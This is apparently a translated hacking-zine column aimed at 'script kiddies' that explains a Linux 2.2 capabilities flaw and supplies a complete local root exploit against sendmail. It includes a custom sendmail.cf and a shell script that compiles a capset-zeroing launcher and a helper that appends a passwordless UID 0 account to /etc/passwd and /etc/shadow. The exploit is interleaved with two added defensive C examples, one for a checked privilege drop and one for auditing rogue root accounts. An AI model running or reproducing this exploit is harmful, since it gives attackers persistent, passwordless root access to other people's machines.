Starting with this issue, I thought I would set up a column for "script
kiddies", if only because I am a very lazy guy, and I remember that in
days not long gone I was hooked on easy-to-use programs that would give
me root in no more than 10 minutes on various Linux boxes. And since
among the magazine's readers there are surely some who want the same...
Recently, it was discovered that the 2.2.x kernels have a big problem,
and that problem is exactly what we are going to discuss today.
The "capabilities" required by one of the POSIX standards have recently
been implemented in the Linux kernel, more precisely from around 2.2
onward. These "capabilities" are in fact a new way of controlling
privileges, one that states more specifically what privileged processes
are allowed to do (I don't want to be too mean to the magazine's
readers, but you do know what processes are, right?).
The problem with these capabilities is that they are inherited from the
parent process by the child process exactly as they are. And now the way
to exploit this: if we set all the capabilities to 0 (that is, the least
privileged mode possible), a program such as sendmail, which tries to do
a setgid and a setuid before doing things that could harm the system if
they were run as root, will no longer manage to do so and will keep
running as root. And if you have a program that runs as root and does
everything you want, is there any problem left in controlling that
machine? I don't think so.
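
The failure described above comes down to a privilege drop whose result is never checked. The following C code is an added example, not code from this article or from sendmail: it contrasts the unchecked pattern with a checked drop, using a constructed simulation of a root process whose identity changes are refused (`id_ops`, the `sim_*` helpers and the `drop_*` functions are hypothetical names).

```c
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>

/* Identity calls behind a table so the failure can be simulated without root. */
struct id_ops {
    int   (*set_gid)(gid_t);
    int   (*set_uid)(uid_t);
    uid_t (*get_euid)(void);
    gid_t (*get_egid)(void);
};

enum drop_result { DROP_OK, DROP_SETGID_FAILED, DROP_SETUID_FAILED,
                   DROP_NOT_EFFECTIVE, DROP_REVERSIBLE };

/* Constructed stand-in for the state described above: the process is root,
 * but the parent zeroed its capabilities, so identity changes get EPERM. */
static uid_t sim_euid;
static gid_t sim_egid;
static int   sim_can_setid;
static void sim_reset(int can_setid) { sim_euid = 0; sim_egid = 0; sim_can_setid = can_setid; }
static int sim_setgid(gid_t g) {
    if (!sim_can_setid) { errno = EPERM; return -1; }
    sim_egid = g; return 0;
}
static int sim_setuid(uid_t u) {
    if (!sim_can_setid) { errno = EPERM; return -1; }
    sim_euid = u;
    if (u != 0) sim_can_setid = 0;   /* a full drop gives up the way back */
    return 0;
}
static uid_t sim_geteuid(void) { return sim_euid; }
static gid_t sim_getegid(void) { return sim_egid; }
static const struct id_ops SIM_OPS  = { sim_setgid, sim_setuid, sim_geteuid, sim_getegid };
static const struct id_ops REAL_OPS = { setgid, setuid, geteuid, getegid };

/* Unchecked pattern: results ignored; returns the euid the caller ends up with. */
static uid_t drop_unchecked(const struct id_ops *ops, uid_t uid, gid_t gid) {
    (void)ops->set_gid(gid);
    (void)ops->set_uid(uid);
    return ops->get_euid();
}

/* Checked drop: group first, test every result, verify, then prove root is gone. */
static enum drop_result drop_checked(const struct id_ops *ops, uid_t uid, gid_t gid) {
    if (ops->set_gid(gid) != 0) return DROP_SETGID_FAILED;
    if (ops->set_uid(uid) != 0) return DROP_SETUID_FAILED;
    if (ops->get_euid() != uid || ops->get_egid() != gid) return DROP_NOT_EFFECTIVE;
    if (uid != 0 && ops->set_uid(0) == 0) return DROP_REVERSIBLE;
    return DROP_OK;
}

int main(void) {
    /* Real use: drop to the invoking user and refuse to continue on any failure. */
    return drop_checked(&REAL_OPS, getuid(), getgid()) == DROP_OK ? 0 : 1;
}
```

A caller that gets anything other than `DROP_OK` should exit before touching user-controlled input or configuration.
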
Good. And since the column is called "sKript Kiddo", let's now look at
the script that makes the whole story work as it should. But don't rush.
First let me explain what I want to do. To begin with, I intend to play
at being sendmail, that is, to use sendmail as a skeleton key into the
system. As you know, sendmail has a configuration file, called
sendmail.cf. Well, I don't like that file, so I am going to write
another one. Then I intend to write a small program that blows away
sendmail's privileges, so that sendmail can no longer do setuid and
setgid, and then the sendmail.cf I wrote will tell sendmail to run a
program that writes a new line into /etc/passwd and /etc/shadow, which
will give me a root account.
So. Copy everything that follows into a file that you will name
sendmail.cf. At the end of the file, around the 15th line from the top
down, there is a commented line. Follow the instructions.
--- Cut Here (sendmail.cf) --
V8/Berkeley
Cwlocalhost
Fw/etc/sendmail.cw
DSlocalhost
CO @ % !
C..
C[[
Kaccess hash -o /etc/mail/access
FR-o /etc/mail/relay-domains
Kdequote dequote
CE root
DnMAILER-DAEMON
CPREDIRECT
DZ8.9.3
O SevenBitInput=False
O EightBitMode=pass8
O AliasWait=10
O AliasFile=/etc/aliases
O MinFreeBlocks=100
O BlankSub=.
O HoldExpensive=False
O DeliveryMode=background
O AutoRebuildAliases=True
O TempFileMode=0600
O HelpFile=/usr/lib/sendmail.hf
O SendMimeErrors=True
O ForwardPath=$z/.forward.$w:$z/.forward
O ConnectionCacheSize=2
O ConnectionCacheTimeout=5m
O UseErrorsTo=False
O LogLevel=9
O CheckAliases=False
O OldStyleHeaders=True
O PrivacyOptions=authwarnings
O QueueDirectory=/tmp
O Timeout.connect=1m
O Timeout.queuereturn=5d
O Timeout.queuewarn=4h
O SuperSafe=True
O StatusFile=/var/log/sendmail.st
O DefaultUser=8:12
O TryNullMXList=true
O RefuseLA=12
O MaxDaemonChildren=20
O ConnectionRateThrottle=1
O HostsFile=/etc/hosts
O SmtpGreetingMessage=$j Sendmail $v/$Z; $b
O UnixFromLine=From $g $d
O OperatorChars=.:%@!^/[]+
O DontProbeInterfaces=true
Pfirst-class=0
Pspecial-delivery=100
Plist=-30
Pbulk=-60
Pjunk=-100
Troot
Tdaemon
Tuucp
H?P?Return-Path: <$g>
HReceived: $?sfrom $s $.$?_($?s$|from $.$_)
$.by $j ($v/$Z)$?r with $r$. id $i$?u
for $u; $|;
$.$b
H?D?Resent-Date: $a
H?D?Date: $a
H?F?Resent-From: $?x$x <$g>$|$g$.
H?F?From: $?x$x <$g>$|$g$.
H?x?Full-Name: $x
H?M?Resent-Message-Id: <$t.$i@$j>
H?M?Message-Id: <$t.$i@$j>
S3
R$@ $@ <@>
R$* $: $1 <@> mark addresses
R$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>
R@ $* <@> $: @ $1 unmark @host:...
R$* :: $* <@> $: $1 :: $2 unmark node::addr
R:include: $* <@> $: :include: $1 unmark :include:...
R$* [ $* : $* ] <@> $: $1 [ $2 : $3 ] unmark IPv6 addrs
R$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon
R$* : $* <@> $: $2 strip colon if marked
R$* <@> $: $1 unmark
R$* ; $1 strip trailing semi
R$* < $* ; > $1 < $2 > bogus bracketed semi
R$@ $@ :; <@>
R$* $: < $1 > housekeeping <>
R$+ < $* > < $2 > strip excess on left
R< $* > $+ < $1 > strip excess on right
R<> $@ < @ > MAIL FROM:<> case
R< $+ > $: $1 remove housekeeping <>
R@ $+ , $+ @ $1 : $2 change all "," to ":"
R@ $+ : $+ $@ $>96 < @$1 > : $2 handle <route-addr>
R $+ : $* ; @ $+ $@ $>96 $1 : $2 ; < @ $3 > list syntax
R $+ : $* ; $@ $1 : $2; list syntax
R$+ @ $+ $: $1 < @ $2 > focus on domain
R$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right
R$+ < @ $+ > $@ $>96 $1 < @ $2 > already canonical
R$* < @ $* : $* > $* $1 < @ $2 $3 > $4 nix colons in addrs
R$- ! $+ $@ $>96 $2 < @ $1 .UUCP > resolve uucp names
R$+ . $- ! $+ $@ $>96 $3 < @ $1 . $2 > domain uucps
R$+ ! $+ $@ $>96 $2 < @ $1 .UUCP > uucp subdomains
R$* % $* $1 @ $2 First make them all @s.
R$* @ $* @ $* $1 % $2 @ $3 Undo all but the last.
R$* @ $* $@ $>96 $1 < @ $2 > Insert < > and finish
R$* $@ $>96 $1
S96
R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all
R$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain
R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain
R$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [a.b.c.d]
R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal
R$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr
R$* < @ $+ . UUCP > $* $: $1 < @ $[ $2 $] . UUCP . > $3
R$* < @ $+ . . UUCP . > $* $@ $1 < @ $2 . > $3
R$* < @ $=w > $* $: $1 < @ $2 . > $3
R$* < @ $j > $* $: $1 < @ $j . > $2
R$* < @ $=M > $* $: $1 < @ $2 . > $3
R$* < @ $* $=P > $* $: $1 < @ $2 $3 . > $4
R$* < @ $* . . > $* $1 < @ $2 . > $3
S4
R$* <@> $@ handle <> and list:;
R$* < @ $+ . > $* $1 < @ $2 > $3
R$* < @ *LOCAL* > $* $1 < @ $j > $2
R$* < $+ > $* $1 $2 $3 defocus
R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical
R@ $* $@ @ $1 ... and exit
R$+ @ $- . UUCP $2!$1 [email protected] => h!u
R$+ % $=w @ $=w $1 @ $2 u%host@host => u@host
S97
R$* $: $>3 $1
R$* $@ $>0 $1
S0
R$* $: $>Parse0 $1 initial parsing
R<@> $#local $: <@> special case error msgs
R$* $: $>98 $1 handle local hacks
R$* $: $>Parse1 $1 final parsing
SParse0
R<@> $@ <@> special case error msgs
R$* : $* ; <@> $#error $@ 5.1.3 $: "List:; syntax illegal for
recipient addresses"
#R@ <@ $* > < @ $1 > catch "@@host" bogosity
R<@ $+> $#error $@ 5.1.3 $: "User address required"
R$* $: <> $1
R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3
R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "Colon illegal
in host name part"
R<> $* $1
R$* < @ . $* > $* $#error $@ 5.1.2 $: "Invalid host name"
R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "Invalid host name"
R$* < @ > $* $@ $>Parse0 $>3 $1 user@ => user
R< @ $=w . > : $* $@ $>Parse0 $>3 $2 @here:... -> ...
R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@here
R< @ $+ > $#error $@ 5.1.3 $: "User address required"
R$* $=O $* < @ $=w . > $@ $>Parse0 $>3 $1 $2 $3 ...@here ->
...
R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"
R< @ *LOCAL* > $#error $@ 5.1.3 $: "User address required"
R$* $=O $* < @ *LOCAL* >
$@ $>Parse0 $>3 $1 $2 $3 ...@*LOCAL* -> ...
R$* < @ *LOCAL* > $: $1
SParse1
R$* < @ [ $+ ] > $* $: $>98 $1 < @ [ $2 ] > $3 numeric
internet spec
R$* < @ [ $+ ] > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 still
numeric: send
R$+ < @ $=w . > $: < $(virtuser $1 @ $2 $@ $1 $: @ $) > $1
< @ $2 . >
R<@> $+ + $* < @ $* . >
$: < $(virtuser $1 + * @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 .
>
R<@> $+ + $* < @ $* . >
$: < $(virtuser $1 @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >
R<@> $+ < @ $+ . > $: < $(virtuser @ $2 $@ $1 $: @ $) >
$1 < @ $2 . >
R<@> $+ $: $1
R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2
R< $+ > $+ < @ $+ > $: $>97 $1
R$=L < @ $=w . > $#local $: @ $1 special local names
R$+ < @ $=w . > $#local $: $1 regular local name
R$* < @ $* > $* $: $>95 < $S > $1 < @ $2 > $3 glue
on smarthost name
R$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 [email protected]
R$=L $#local $: @ $1 special local names
R$+ $#local $: $1 regular local names
S5
R$+ + * $#local $@ $&h $: $1
R$+ + $* $#local $@ + $2 $: $1 + *
R$+ $: <> $1
R< > $+ $: < $H > $1 try hub
R< > $+ $: < $R > $1 try relay
R< > $+ $: < > < $1 $&h > nope, restore +detail
R< > < $+ + $* > $* < > < $1 > + $2 $3 find the
user part
R< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +
R< > < $+ > $@ $1 no +detail
R$+ $: $1 <> $&h add +detail back in
R$+ <> + $* $: $1 + $2 check whether +detail
R$+ <> $* $: $1 else discard
R< local : $* > $* $: $>95 < local : $1 > $2 no host extension
R< error : $* > $* $: $>95 < error : $1 > $2 no host extension
R< $- : $+ > $+ $: $>95 < $1 : $2 > $3 < @ $2 >
R< $+ > $+ $@ $>95 < $1 > $2 < @ $1 >
S95
R< > $* $@ $1 strip off null relay
R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2
R< local : $* > $* $>CanonLocal < $1 > $2
R< $- : $+ @ $+ > $*<$*>$* $# $1 $@ $3 $: $2<@$3> use
literal user
R< $- : $+ > $* $# $1 $@ $2 $: $3 try qualified mailer
R< $=w > $* $@ $2 delete local host
R< $+ > $* $#relay $@ $1 $: $2 use unqualified mailer
SCanonLocal
R< $* > < @ $+ > : $+ $@ $>97 $3
R< $* > $+ $=O $+ < @ $+ > $@ $>97 $2 $3 $4
R< $* > $* < @ $* . > $: < $1 > $2 < @ $3 >
R< > $* < @ $* > $* $#local $@ $1@$2 $: $1
R< > $+ $#local $@ $1 $: $1
R< $+ @ $+ > $* < @ $* > $: < $1 > $3 < @ $4 >
R< $+ > $* <@ $* > $* $#local $@ $2@$3 $: $1
R< $+ > $* $#local $@ $2 $: $1
S93
R$=E < @ *LOCAL* > $@ $1 < @ $j . > leave exposed
R$=E < @ $=M . > $@ $1 < @ $2 . >
R$=E < @ $=w . > $@ $1 < @ $2 . >
R$* < @ $=M . > $* $: $1 < @ $2 . @ $M > $3 convert masqueraded
doms
R$* < @ $=w . > $* $: $1 < @ $2 . @ $M > $3
R$* < @ *LOCAL* > $* $: $1 < @ $j . @ $M > $2
R$* < @ $+ @ > $* $: $1 < @ $2 > $3 $M is null
R$* < @ $+ @ $+ > $* $: $1 < @ $3 . > $4 $M is not null
S94
R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2
S98
R wmail.$- $# wmail $: $1
R wmail.$- < @ $=w . > $# wmail $: $1
R wmail.$- < @ [ $=w ] . > $# wmail $: $1
R wmail.$- < @ [ $+ ] . > $# wmail $: $1
R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT . > < ${opMode}
>
R$* < @ $+ .REDIRECT. > <i> $: $1 < @ $2 . REDIRECT. >
R$* < @ $+ .REDIRECT. > < $- > $# error $@ 5.1.1 $: "551
User has moved; please try " <$1@$2>
SLookUpDomain
R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1>
<$2> <$3>
R<?> <$+.$+> <$+> <$*> $@ $>LookUpDomain <$2>
<$3> <$4>
R<?> <$+> <$+> <$*> $@ <$2> <$3>
R<$*> <$+> <$+> <$*> $@ <$1> <$4>
SLookUpAddress
R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1>
<$2> <$3>
R<?> <$+.$-> <$+> <$*> $@ $>LookUpAddress <$1>
<$3> <$4>
R<?> <$+> <$+> <$*> $@ <$2> <$3>
R<$*> <$+> <$+> <$*> $@ <$1> <$4>
SCanonAddr
R$* $: $>Parse0 $>3 $1 make domain canonical
R< @ $+ > : $* @ $* < @ $1 > : $2 % $3 change @ to % in src
route
R$* < @ $+ > : $* : $* $3 $1 < @ $2 > : $4 change to % hack.
R$* < @ $+ > : $* $3 $1 < @ $2 >
SParseRecipient
R$* $: <?> $>CanonAddr $1
R<?> $* < @ $* . > <?> $1 < @ $2 > strip trailing
dots
R<?> $- < @ $* > $: <?> $(dequote $1 $) < @ $2 >
dequote local part
R<?> $* $=O $* < @ $* > $: <NO> $1 $2 $3 < @ $4>
R<?> $* $@ $1
R<NO> $* < @ $* $=R > $: <RELAY> $1 < @ $2 $3 >
R<NO> $* < @ $+ > $: $>LookUpDomain <$2> <NO>
<$1 < @ $2 >>
R<$+> <$+> $: <$1> $2
R<RELAY> $* < @ $* > $@ $>ParseRecipient $1
R<$-> $* $@ $2
SLocal_check_relay
Scheck_relay
R$* $: $1 $| $>"Local_check_relay" $1
R$* $| $* $| $#$* $#$3
R$* $| $* $| $* $@ $>"Basic_check_relay" $1 $| $2
SBasic_check_relay
R$* $: < ${deliveryMode} > $1
R< d > $* $@ deferred
R< $* > $* $: $2
R$+ $| $+ $: $>LookUpDomain < $1 > <?> < $2 >
R<?> < $+ > $: $>LookUpAddress < $1 > <?> <
$1 >
R<?> < $+ > $: $1
R<OK> < $* > $@ OK
R<RELAY> < $* > $@ RELAY
R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"
R<DISCARD> $* $#discard $: discard
R<$+> $* $#error $@ 5.7.1 $: $1
SLocal_check_mail
Scheck_mail
R$* $: $1 $| $>"Local_check_mail" $1
R$* $| $#$* $#$2
R$* $| $* $@ $>"Basic_check_mail" $1
SBasic_check_mail
R$* $: < ${deliveryMode} > $1
R< d > $* $@ deferred
R< $* > $* $: $2
R<> $@ <OK>
R$* $: <?> $>CanonAddr $1
R<?> $* < @ $+ . > <?> $1 < @ $2 > strip trailing
dots
R<?> $* < $* $=P > $* $: <OK> $1 < @ $2 $3 > $4
R<?> $* < @ $+ > $* $: <OK> $1 < @ $2 > $3 ...
unresolvable OK
R<$+> $* < @localhost > $: < ? $&{client_name} >
<$1> $2 < @localhost >
R<$+> $* < @localhost.$m >
$: < ? $&{client_name} > <$1> $2 < @localhost.$m >
R<$+> $* < @localhost.UUCP >
$: < ? $&{client_name} > <$1> $2 < @localhost.UUCP
>
R<? $=w> <$+> $* <?> <$2> $3
R<? $+> <$+> $* $#error $@ 5.5.4 $: "553 Real domain
name required"
R<?> <$+> $* $: <$1> $2
R<$+> $* < @ $+ > $* $: <USER $(access $2@ $: ? $) >
<$1> $2 < @ $3 > $4
R<USER ?> <$+> $* < @ $* > $*
$: <USER $(access $2@$3$4 $: ? $) > <$1> $2 < @ $3 >
$4
R<USER ?> <$+> $+ < @ $+ > $*
$: <USER $(access $2@$3 $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $* < @ $+ > $*
$: $>LookUpDomain <$3> <$1> <>
R<?> $* $: <USER $(access $1@ $: ? $) > <?> $1
R<USER $+> <$+> $* $: <$1> $3
R<?> $* $: < ? $&{client_name} > $1
R<?> $* $@ <OK> ...local unqualed ok
R<? $+> $* $#error $@ 5.5.4 $: "553 Domain name required"
...remote is not
R<?> $* $@ <OK>
R<OK> $* $@ <OK>
R<TEMP> $* $#error $@ 4.1.8 $: "451 Sender domain must resolve"
R<PERM> $* $#error $@ 5.1.8 $: "501 Sender domain must exist"
R<RELAY> $* $@ <RELAY>
R<DISCARD> $* $#discard $: discard
R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"
R<$+> $* $#error $@ 5.7.1 $: $1 error from access db
SLocal_check_rcpt
Scheck_rcpt
R$* $: $1 $| $>"Local_check_rcpt" $1
R$* $| $#$* $#$2
R$* $| $* $@ $>"Basic_check_rcpt" $1
SBasic_check_rcpt
R$* $: < ${deliveryMode} > $1
R< d > $* $@ deferred
R< $* > $* $: $2
R$* $: $>ParseRecipient $1 strip relayable hosts
R$* $: <?> $1
R<?> $+ < @ $=w > $: <> <USER $1> <FULL $1@$2>
<HOST $2> <$1 < @ $2 >>
R<?> $+ < @ $* > $: <> <FULL $1@$2> <HOST $2>
<$1 < @ $2 >>
R<?> $+ $: <> <USER $1> <$1>
R<> <USER $+> $* $: <$(access $1 $: $)> $2
R<> <FULL $+> $* $: <$(access $1 $: $)> $2
R<OK> <FULL $+> $* $: <$(access $1 $: $)> $2
R<> <HOST $+> $* $: <$(access $1 $: $)> $2
R<OK> <HOST $+> $* $: <$(access $1 $: $)> $2
R<> <$*> $: $1
R<OK> <$*> $: $1
R<RELAY> <$*> $: $1
R<REJECT> $* $#error $@ 5.2.1 $: "550 Mailbox disabled for
this recipient"
R<$+> $* $#error $@ 5.2.1 $: $1 error from access db
R$+ < @ $=w > $@ OK
R$+ < @ $* $=R > $@ OK
R$+ < @ $* > $: $>LookUpDomain <$2> <?> <$1 <
@ $2 >>
R<RELAY> $* $@ RELAY
R<$*> <$*> $: $2
R$* $: <?> $1
R<?> $* < @ $+ > $: <REMOTE> $1 < @ $2 >
R<?> $+ $@ OK
R<$+> $* $: $2
R$* $: <?> $&{client_name}
R<?> [$+] $: <BAD> [$1]
R<?> $* $~P $: <?> $[ $1 $2 $]
R<$-> $* $: $2
R$* . $1 strip trailing dots
R$@ $@ OK
R$=w $@ OK
R$* $=R $@ OK
R$* $: $>LookUpDomain <$1> <?> <$1>
R<RELAY> $* $@ RELAY
R<$*> <$*> $: $2
R$* $: $&{client_addr}
R$@ $@ OK originated locally
R0 $@ OK originated locally
R$=R $* $@ OK relayable IP address
R$* $: $>LookUpAddress <$1> <?> <$1>
R<RELAY> $* $@ RELAY relayable IP address
R<$*> <$*> $: $2
R$* $: [ $1 ] put brackets around it...
R$=w $@ OK ... and see if it is local
R$* $#error $@ 5.7.1 $: "550 Relaying denied"
Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,
A=procmail -Y -m $h $f $u
Msmtp, P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990,
T=DNS/RFC822/SMTP,
A=IPC $h
Mesmtp, P=[IPC], F=mDFMuXa, S=11/31, R=21, E=\r\n, L=990,
T=DNS/RFC822/SMTP,
A=IPC $h
Msmtp8, P=[IPC], F=mDFMuX8, S=11/31, R=21, E=\r\n, L=990,
T=DNS/RFC822/SMTP,
A=IPC $h
Mrelay, P=[IPC], F=mDFMuXa8, S=11/31, R=61, E=\r\n, L=2040,
T=DNS/RFC822/SMTP,
A=IPC $h
S11
R$+ $: $>51 $1 sender/recipient common
R$* :; <@> $@ list:; special case
R$* $: $>61 $1 qualify unqual'ed names
R$+ $: $>94 $1 do masquerading
S21
R$+ $: $>51 $1 sender/recipient common
R$+ $: $>61 $1 qualify unqual'ed names
S31
R$+ $: $>51 $1 sender/recipient common
R:; <@> $@ list:; special case
R$* <@> $* $@ $1 <@> $2 pass null host through
R< @ $* > $* $@ < @ $1 > $2 pass route-addr through
R$* $: $>61 $1 qualify unqual'ed names
R$+ $: $>93 $1 do masquerading
S51
R< @ $+ > $* $@ < @ $1 > $2 resolve <route-addr>
R$+ < @ $+ .UUCP. > $: < $2 ! > $1 convert to UUCP form
R$+ < @ $* > $* $@ $1 < @ $2 > $3 not UUCP form
R< $&h ! > $- ! $+ $@ $2 < @ $1 .UUCP. >
R< $&h ! > $-.$+ ! $+ $@ $3 < @ $1.$2 >
R< $&h ! > $+ $@ $1 < @ $&h .UUCP. >
R< $+ ! > $+ $: $1 ! $2 < @ $Y > use UUCP_RELAY
R$+ < @ $+ : $+ > $@ $1 < @ $3 > strip mailer: part
R$+ < @ > $: $1 < @ *LOCAL* > if no UUCP_RELAY
S61
R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified
R$+ $@ $1 < @ *LOCAL* > add local qualification
S71
R$+ $: $>61 $1
R$+ $: $>93 $1
# on the next line, replace the string /calea/spre with the current directory
# e.g.: /home/user
Mlocal, P=/calea/spre/add, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=add -Y -a $h -d $u
Mprog, P=/usr/sbin/smrsh, F=lsDFMoqeu9, S=10/30, R=20/40, D=$z:/,
T=X-Unix,
A=sh -c $u
Mwmail, P=/usr/local/wMail/wmail,
F=lsD, S=10/30, R=20/40, D=/tmp/,
T=X-Unix,
A=/usr/local/wMail/wmail $u
S10
R<@> $n errors to mailer-daemon
R@ <@ $*> $n temporarily bypass Sun bogosity
R$+ $: $>50 $1 add local domain if needed
R$* $: $>94 $1 do masquerading
S20
R$+ < @ $* > $: $1 strip host part
S30
R<@> $n errors to mailer-daemon
R@ <@ $*> $n temporarily bypass Sun bogosity
R$+ $: $>50 $1 add local domain if needed
R$* $: $>93 $1 do masquerading
S40
R$+ $: $>50 $1 add local domain if needed
S50
R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified
R$+ $@ $1 < @ *LOCAL* > add local qualification
--- Cut here (done) --
And finally, the script
--- CUT HERE ---
#!/bin/sh
#
# This script is adapted and modified from the programs that were
# published on the BUGTRAQ mailing list.
# Using it can cause damage and is in general against the law.
# Personally, I recommend that you do not use it.
# I also recommend that you do not distribute it, even though it is
# under the GPL license.
echo creez fisierele sursa
cat <<gata1> ex.c
#include <linux/capability.h>
int main (void) {
cap_user_header_t header;
cap_user_data_t data;
header = malloc(8);
data = malloc(12);
header->pid = 0;
header->version = _LINUX_CAPABILITY_VERSION;
data->inheritable = data->effective = data->permitted
= 0;
capset(header, data);
execlp("/usr/sbin/sendmail", "sendmail"
,"-t", "-C", "./sendmail.cf", NULL);
}
gata1
echo shi acuma cel de-al doilea
cat <<gata.2> add.c
#include <fcntl.h>
int main (void) {
int fd;
char string[250];
seteuid(0);
setegid(0);
setuid(0);
setgid(0);
system("chmod u+w /etc/shadow");
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);
}
gata.2
echo compilez...
gcc -o add add.c
gcc -o ex ex.c
cat <<gata3> mailexp
From: [email protected]
To: root@localhost
Subject: foo
bar
.
gata3
echo rulez xploitu
./ex < mailexp
echo shi acuma ashteptatzi un pic...
sleep 10
echo root access pentru dumneavoastra
echo daca nu exista ssh instalat in sistem incercati
echo su shmekeru
ssh -lshmekeru localhost
-- Cut here (done) --
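
The add.c helper above leaves two durable traces: a second UID 0 entry in /etc/passwd and an entry with an empty password field in /etc/shadow. The following C audit is an added example, not part of the original article; it scans file images for both conditions, and the sample data is constructed (only the `shmekeru` lines are taken from the listing above; all function names are hypothetical).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy colon-separated field idx (0-based) of the line starting at `line`
 * into out. Empty fields are kept. Returns 0, or -1 if missing or too long. */
static int field(const char *line, int idx, char *out, size_t outsz) {
    const char *p = line;
    for (int i = 0; i < idx; i++) {
        p += strcspn(p, ":\n");
        if (*p != ':') return -1;          /* ran out of fields on this line */
        p++;
    }
    size_t n = strcspn(p, ":\n");
    if (n >= outsz) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* passwd(5): name:passwd:UID:GID:... Flag UID 0 under any name but "root". */
static int is_extra_uid0(const char *line) {
    char name[64], uid[16], *end;
    if (field(line, 0, name, sizeof name) || field(line, 2, uid, sizeof uid)) return 0;
    long v = strtol(uid, &end, 10);
    return uid[0] != '\0' && *end == '\0' && v == 0 && strcmp(name, "root") != 0;
}

/* shadow(5): name:hash:... An empty hash field means no password is required. */
static int is_empty_password(const char *line) {
    char name[64], hash[256];
    if (field(line, 0, name, sizeof name) || field(line, 1, hash, sizeof hash)) return 0;
    return name[0] != '\0' && hash[0] == '\0';
}

/* Apply a per-line predicate to a whole file image and count the hits. */
static int count_lines(const char *text, int (*pred)(const char *)) {
    int hits = 0;
    while (text && *text) {
        hits += pred(text);
        text = strchr(text, '\n');
        if (text) text++;
    }
    return hits;
}

/* Constructed sample files; the last line of each is the entry add.c appends. */
static const char SAMPLE_PASSWD[] =
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:2:2:daemon:/sbin:/sbin/nologin\n"
    "shmekeru:x:0:0::/root:/bin/sh\n";
static const char SAMPLE_SHADOW[] =
    "root:$1$constructed$hashvalue:11000:0:99999:7:::\n"
    "daemon:*:11000:0:99999:7:::\n"
    "shmekeru::11029:0:99999:7:::\n";

int main(void) {
    int uid0 = count_lines(SAMPLE_PASSWD, is_extra_uid0);
    int empty = count_lines(SAMPLE_SHADOW, is_empty_password);
    printf("extra UID 0 accounts: %d, empty passwords: %d\n", uid0, empty);
    return (uid0 || empty) ? 1 : 0;
}
```
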